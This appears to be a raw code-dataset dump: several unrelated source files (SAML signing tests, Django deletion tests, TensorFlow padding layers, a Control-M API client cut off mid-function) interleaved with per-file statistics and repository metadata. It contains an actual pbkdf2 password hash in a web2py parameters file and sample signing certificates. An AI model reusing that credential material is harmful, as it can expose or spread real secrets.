Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>+ia+Gd5r/5P3C8IwhDTkpEC7rQI=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>t1IywxEzobY8ZyHL+iuB+E3zzVAWByUjRqFTdyNerGbGSRwo0oYWx6hcYX+ST1DTDaQ50gV2PJeibbykFsA3vQ==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature>' self._test(ET.tostring(signature_xml, method='c14n').decode('utf-8'), expected_xml) class TestAssertionSalesForce(XmlTest): def test_assertion(self): # This test simply verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) self._test_template(xml_templates.AssertionSalesforceTemplate, params, ASSERTION_SALESFORCE_XML) def test_assertion_rendering(self): # Verifies that the xml rendering is OK. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) got = xml_render.get_assertion_salesforce_xml(params, signed=False) self._test(got, ASSERTION_SALESFORCE_XML) def test_signed_assertion(self): # This test verifies that the assertion got signed properly. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) params.update(ASSERTION_SALESFORCE_PARAMS) got = xml_render.get_assertion_salesforce_xml(params, signed=True) self._test(got, SIGNED_ASSERTION_SALESFORCE_XML) class TestResponse(XmlTest): def test_response(self): # This test simply verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) xml_render._get_in_response_to(params) got = xml_templates.ResponseTemplate( params, ASSERTION_SALESFORCE_XML).get_xml_string() self._test(got, RESPONSE_XML) def test_response_rendering(self): # Verifies that the rendering is OK. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, ASSERTION_SALESFORCE_XML, signed=False) self._test(got, RESPONSE_XML) def test_response_with_signed_assertion(self): # This test also verifies that the template isn't bad. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, SIGNED_ASSERTION_SALESFORCE_XML, signed=False) self._test(got, RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML) def test_signed_response_with_signed_assertion(self): # This test verifies that the response got signed properly. params = {} params.update(IDP_PARAMS) params.update(REQUEST_PARAMS) params.update(RESPONSE_PARAMS) got = xml_render.get_response_xml(params, SIGNED_ASSERTION_SALESFORCE_XML, signed=True) self._test(got, SIGNED_RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML) def test_loading_private_key(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-private-key.pem') config = {smd.PRIVATE_KEY_FILENAME: filename} assert type(filename) is str xml_signing.load_private_key(config) filename = filename.encode('utf-8') config = {smd.PRIVATE_KEY_FILENAME: filename} xml_signing.load_private_key(config) def test_signing_data_with_private_key(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-private-key.pem') config = {smd.PRIVATE_KEY_FILENAME: filename} private_key = xml_signing.load_private_key(config) data = "Some interesting data." signature = xml_signing.sign_with_rsa(private_key, data) assert signature != data def test_loading_certificate_from_file(): filename = os.path.join(os.getcwd(), 'keys/sample/sample-certificate.pem') config = {smd.CERTIFICATE_FILENAME: filename} assert type(filename) is str xml_signing.load_certificate(config) filename = filename.encode('utf-8') config = {smd.CERTIFICATE_FILENAME: filename} certificate = xml_signing.load_certificate(config) assert certificate == X509_CERTIFICATE_DATA def test_loading_certificate_from_string(settings): config = {smd.CERTIFICATE_DATA: X509_CERTIFICATE_DATA} certificate = xml_signing.load_certificate(config) assert certificate == X509_CERTIFICATE_DATA
116.176471
5,112
0.803122
2,506
23,700
7.489625
0.094573
0.004156
0.019926
0.024775
0.899728
0.887527
0.86872
0.861207
0.834461
0.82519
0
0.085589
0.069241
23,700
203
5,113
116.748768
0.765266
0.016624
0
0.432258
0
0.045161
0.748058
0.294698
0
0
0
0
0.245161
1
0.090323
false
0.032258
0.058065
0
0.174194
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
1
1
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
e081ecf9a706038b47f5d1216ac98e3405428f28
84
py
Python
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
3
2018-07-29T20:48:15.000Z
2019-03-29T10:42:19.000Z
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
null
null
null
exporter/__init__.py
moehrenzahn/worktimer
ab92e8625652d94987c7da8ccdbf29be72bf3612
[ "MIT" ]
null
null
null
from exporter.excel import * from exporter.ods import * from exporter.text import *
21
28
0.785714
12
84
5.5
0.5
0.545455
0.545455
0
0
0
0
0
0
0
0
0
0.142857
84
3
29
28
0.916667
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
e0838a257f6cd72c35cd75e7ab8f2a33ece1f927
3,611
py
Python
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
25
2019-05-23T11:19:18.000Z
2022-02-19T15:28:09.000Z
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
49
2019-09-17T08:40:22.000Z
2022-03-02T14:08:27.000Z
tests/tests/logical_deletion/tests.py
ChanTsune/Django-Boost
5141605132c1d46aee978ee3cdbc8db5e9d4b8c4
[ "MIT" ]
4
2019-09-17T08:16:55.000Z
2020-08-24T09:33:16.000Z
from django.test import TestCase, override_settings @override_settings( DATABASES={ 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': ':memory:', } } ) class TestLogicalDeletionMixin(TestCase): from .models import LogicalDeletionModel model = LogicalDeletionModel def _register_items(self, *args): for item in args: self.model.objects.create(name=item) def test_delete(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertNotEqual(item.deleted_at, None) def test_hard_delete(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete(hard=True) with self.assertRaises(self.model.DoesNotExist): self.model.objects.get(name="0") def test_alive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.alive()), 9) def test_dead(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.dead()), 1) def test_revive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertEqual(len(self.model.objects.dead()), 1) self.assertEqual(len(self.model.objects.alive()), 9) item.revive() self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 10) def test_is_dead(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") item.delete() self.assertTrue(item.is_dead()) def test_is_alive(self): self._register_items(*[str(i) for i in range(10)]) item = self.model.objects.get(name="0") self.assertTrue(item.is_alive()) class TestLogicalDeletionManager(TestCase): from .models import LogicalDeletionModel model = LogicalDeletionModel def _register_items(self, *args): for item in args: self.model.objects.create(name=item) def _hard_delete(self): for i in self.model.objects.all(): i.delete(hard=True) def test_delete(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete() self.assertEqual(len(self.model.objects.dead()), 10) self._hard_delete() def test_hard_delete(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete(hard=True) self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 0) self.assertEqual(len(self.model.objects.all()), 0) self._hard_delete() def test_revive(self): self._register_items(*[str(i) for i in range(10)]) self.model.objects.delete() self.assertEqual(len(self.model.objects.dead()), 10) self.assertEqual(len(self.model.objects.alive()), 0) self.assertEqual(len(self.model.objects.all()), 10) self.model.objects.revive() self.assertEqual(len(self.model.objects.dead()), 0) self.assertEqual(len(self.model.objects.alive()), 10) self.assertEqual(len(self.model.objects.all()), 10) self._hard_delete()
33.747664
61
0.62725
473
3,611
4.680761
0.120507
0.130081
0.224029
0.158988
0.809846
0.799006
0.788166
0.788166
0.767389
0.745257
0
0.018253
0.226253
3,611
106
62
34.066038
0.774159
0
0
0.674419
0
0
0.016339
0.0072
0
0
0
0
0.232558
1
0.151163
false
0
0.034884
0
0.232558
0
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
e0f731f257289cbc8a4bd73794fd3cd4a2876254
92
py
Python
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
parameters_8000.py
pjavete/web2py
b6a3837f0b1f304f01233bd1a2e57fb6fb4d2646
[ "BSD-3-Clause" ]
null
null
null
password="pbkdf2(1000,20,sha512)$b8282e41158ade42$ac63185d61256ecf1045b6681c733a022327dc62"
46
91
0.891304
7
92
11.714286
1
0
0
0
0
0
0
0
0
0
0
0.549451
0.01087
92
1
92
92
0.351648
0
0
0
0
0
0.869565
0.869565
0
0
0
0
0
1
0
false
1
0
0
0
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
1
0
0
0
0
0
8
e0fc632f5472565906feb14e4c037a889a5c20a7
734
py
Python
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
exerciciios/ex031.py
uneves/exercicios-cursoemvideo-python-01
562a7954f33bb7ede090421fb60ce8f2cda8b941
[ "MIT" ]
null
null
null
dist = float(input('Informe a distancia da viagem: ')) if dist<=200: print('O valor da viagem é: R$ {:.2f}'.format(dist*0.5)) else: print('O valor da viagem é: R$ {:.2f}'.format(dist*0.45)) #### # ou #### dist = float(input('Informe a distancia da viagem: ')) print('voce está prestes a comecar uma viagen de {} km'.format(dist)) if dist<=200: preco = dist * 0.50 else: preco = dist * 0.45 print('E o preco de sua passagem será de R$ {:.2f}'.format(preco)) ##### # ou ##### dist = float(input('Informe a distancia da viagem: ')) print('voce está prestes a comecar uma viagen de {} km'.format(dist)) preco = dist * 0.50 if dist <= 200 else dist * 0.45 print('E o preco de sua passagem será de R$ {:.2f}'.format(preco))
31.913043
69
0.634877
127
734
3.669291
0.283465
0.064378
0.077253
0.135193
0.847639
0.847639
0.847639
0.847639
0.763949
0.763949
0
0.049751
0.178474
734
22
70
33.363636
0.723051
0.006812
0
0.6875
0
0
0.470339
0
0
0
0
0
0
1
0
false
0.125
0
0
0
0.375
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
1c9f503f35a9b6be8c04f9d5183d146ff2e6e259
11,628
py
Python
tensorflow/optotf/keras/pad.py
VLOGroup/optox
f9d61d64aa7bb44080601517539ba5aefd75d365
[ "MIT" ]
7
2020-06-17T21:05:46.000Z
2021-03-28T03:52:53.000Z
tensorflow/optotf/keras/pad.py
khammernik/optox
ae8bf1b4c1bfeb1e2fea24f549182d5610e09d82
[ "MIT" ]
4
2021-01-26T12:43:41.000Z
2022-02-10T00:01:41.000Z
tensorflow/optotf/keras/pad.py
khammernik/optox
ae8bf1b4c1bfeb1e2fea24f549182d5610e09d82
[ "MIT" ]
4
2020-09-16T10:03:48.000Z
2022-01-05T01:22:14.000Z
import tensorflow as tf import optotf.pad import unittest class Pad2d(tf.keras.layers.Layer): def __init__(self, padding, mode, channel_last=True): super().__init__() self.padding = padding self.mode = mode self.channel_last = channel_last self.op = optotf.pad._ext.pad2d def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-2] += self.padding[2] + self.padding[3] padded_shape[-1] += self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape def call(self, x): # first reshape the input if self.channel_last: x = tf.transpose(x, [0, 3, 1, 2]) x_r = tf.reshape(x, self.pre_pad_shape, self.post_pad_shape) if x.dtype == tf.complex64 or x.dtype == tf.complex128: x_r = tf.complex(self.op(tf.math.real(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode), self.op(tf.math.imag(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode)) else: x_r = self.op(x_r, left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], mode=self.mode) if self.channel_last: return tf.transpose(tf.reshape(x_r, self.post_pad_shape), [0, 2, 3, 1]) else: return tf.reshape(x_r, self.post_pad_shape) class Pad2dTranspose(Pad2d): def __init__(self, padding, mode, channel_last=True): super().__init__(padding, mode, channel_last=channel_last) self.op = optotf.pad._ext.pad2d_transpose def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-2] -= self.padding[2] + self.padding[3] padded_shape[-1] -= self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape class Pad3d(tf.keras.layers.Layer): def __init__(self, padding, mode, channel_last=True): super().__init__() self.padding = padding self.mode = mode self.channel_last = channel_last self.op = optotf.pad._ext.pad3d def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-3] += self.padding[4] + self.padding[5] padded_shape[-2] += self.padding[2] + self.padding[3] padded_shape[-1] += self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape def call(self, x): # first reshape the input if self.channel_last: x = tf.transpose(x, [0, 2, 3, 4, 1]) x_r = tf.reshape(x, self.pre_pad_shape, self.post_pad_shape) if x.dtype == tf.complex64 or x.dtype == tf.complex128: x_r = tf.complex(self.op(tf.math.real(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode), self.op(tf.math.imag(x_r), left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode)) else: x_r = self.op(x_r, left=self.padding[0], right=self.padding[1], bottom=self.padding[2], top=self.padding[3], front=self.padding[4], back=self.padding[5], mode=self.mode) if self.channel_last: return tf.transpose(tf.reshape(x_r, self.post_pad_shape), [0, 2, 3, 4, 1]) else: return tf.reshape(x_r, self.post_pad_shape) class Pad3dTranspose(Pad3d): def __init__(self, padding, mode, channel_last=True): super().__init__(padding, mode, channel_last=channel_last) self.op = optotf.pad._ext.pad3d_transpose def build(self, input_shape): shape = tf.unstack(input_shape) if self.channel_last: shape = [shape[0], shape[-1], *shape[1:-1]] new_shape = [-1, *shape[2:]] new_shape = tf.stack(new_shape) padded_shape = shape padded_shape[-3] -= self.padding[4] + self.padding[5] padded_shape[-2] -= self.padding[2] + self.padding[3] padded_shape[-1] -= self.padding[0] + self.padding[1] padded_shape = tf.stack(padded_shape) self.pre_pad_shape = new_shape self.post_pad_shape = padded_shape class TestPad(unittest.TestCase): def test2d(self): shape = (5, 2, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_complex(self): shape = (5, 2, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_channel_last(self): shape = (5, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2d(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] += padding[0] + padding[1] new_shape[-3] += padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d(self): shape = (5, 2, 8, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 1] op = Pad3d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape[-3] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_complex(self): shape = (5, 2, 8, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4, 1, 1] op = Pad3d(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] += padding[0] + padding[1] new_shape[-2] += padding[2] + padding[3] new_shape[-3] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_channel_last(self): shape = (5, 8, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 2] op = Pad3d(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] += padding[0] + padding[1] new_shape[-3] += padding[2] + padding[3] new_shape[-4] += padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_transpose(self): shape = (5, 2, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_complex_transpose(self): shape = (5, 2, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test2d_channel_last_transpose(self): shape = (5, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4] op = Pad2dTranspose(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] -= padding[0] + padding[1] new_shape[-3] -= padding[2] + padding[3] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_transpose(self): shape = (5, 2, 8, 10, 10) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 1] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape[-3] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_complex_transpose(self): shape = (5, 2, 8, 10, 10) x = tf.complex(tf.random.normal(shape), tf.random.normal(shape)) padding = [2, 2, 4, 4, 1, 1] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=False) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-1] -= padding[0] + padding[1] new_shape[-2] -= padding[2] + padding[3] new_shape[-3] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) def test3d_channel_last_transpose(self): shape = (5, 8, 10, 10, 2) x = tf.random.normal(shape) padding = [2, 2, 4, 4, 1, 2] op = Pad3dTranspose(padding=padding, mode='symmetric', channel_last=True) Kx = op(x) # manually construct new shape new_shape = list(x.shape) new_shape[-2] -= padding[0] + padding[1] new_shape[-3] -= padding[2] + padding[3] new_shape[-4] -= padding[4] + padding[5] new_shape = tuple(new_shape) self.assertTrue(new_shape == Kx.shape) if __name__ == "__main__": unittest.test()
35.778462
208
0.590815
1,646
11,628
4.008505
0.051033
0.128524
0.055168
0.046075
0.975902
0.975144
0.972416
0.972416
0.969536
0.966808
0
0.043799
0.265652
11,628
325
209
35.778462
0.728891
0.03397
0
0.818182
0
0
0.01034
0
0
0
0
0
0.049587
1
0.090909
false
0
0.012397
0
0.140496
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
1cc13d92f793bce6534055d364bb862b21fdaf19
197
py
Python
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
5
2020-02-03T10:19:47.000Z
2020-12-25T14:04:25.000Z
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
2
2020-06-15T19:52:10.000Z
2020-06-23T18:56:54.000Z
hospital_logfile_analyzer/parsers/__init__.py
pavlodyban/cloverleaf_parser
a65b68d4116d219793e5c19ab4ac6e9125d388eb
[ "MIT" ]
2
2020-06-15T19:27:18.000Z
2020-10-29T10:33:56.000Z
# classes from .logfile_parser import LogfileParser from .cloverleaf_parser import CloverleafLogfileParser # convenience functions from .cloverleaf_parser import parse, verify_file, write_to_json
28.142857
64
0.862944
23
197
7.130435
0.695652
0.219512
0.243902
0.317073
0
0
0
0
0
0
0
0
0.101523
197
6
65
32.833333
0.926554
0.147208
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
1cc7435ed665fbd8e06191c2492f54edf68d794a
48
py
Python
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
BBNX/HCLib/__init__.py
nikitakuklev/ADRNX
b8a07f50788bbbfd36a8f956ca70cf8ed2bd95ee
[ "Apache-2.0" ]
null
null
null
from . import HeaterController from . import PID
24
30
0.8125
6
48
6.5
0.666667
0.512821
0
0
0
0
0
0
0
0
0
0
0.145833
48
2
31
24
0.95122
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
1cd68982e13d887bccb84a40137f38fe7f262fd4
278,489
py
Python
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
ctm_saas_client/api/config_api.py
tadinve/ctm_python_client
de44e5012214ec42bb99b7f9b4ebc5394cd14328
[ "BSD-3-Clause" ]
null
null
null
# coding: utf-8 """ Control-M Services Provides access to BMC Control-M Services # noqa: E501 OpenAPI spec version: 9.20.30 Contact: customer_support@bmc.com Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from ctm_saas_client.api_client import ApiClient class ConfigApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def add_host_to_hostgroup(self, server, hostgroup, agent, **kwargs): # noqa: E501 """add agent to hostgroup # noqa: E501 Add an agent to hostgroup. Create the the hostgroup if it does not exist. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_host_to_hostgroup(server, hostgroup, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param AgentInHostgroup agent: The hostname of the new agent (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, **kwargs) # noqa: E501 else: (data) = self.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, **kwargs) # noqa: E501 return data def add_host_to_hostgroup_with_http_info(self, server, hostgroup, agent, **kwargs): # noqa: E501 """add agent to hostgroup # noqa: E501 Add an agent to hostgroup. Create the the hostgroup if it does not exist. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.add_host_to_hostgroup_with_http_info(server, hostgroup, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the hostgroup belongs to. (required) :param str hostgroup: The hostgroup name (required) :param AgentInHostgroup agent: The hostname of the new agent (required) :return: AgentsInGroupSuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'hostgroup', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method add_host_to_hostgroup" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `add_host_to_hostgroup`") # noqa: E501 # verify the required parameter 'hostgroup' is set if self.api_client.client_side_validation and ('hostgroup' not in params or params['hostgroup'] is None): # noqa: E501 raise ValueError("Missing the required parameter `hostgroup` when calling `add_host_to_hostgroup`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `add_host_to_hostgroup`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'hostgroup' in params: path_params['hostgroup'] = params['hostgroup'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'agent' in params: body_params = params['agent'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/hostgroup/{hostgroup}/agent', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='AgentsInGroupSuccessData', # noqa: E501 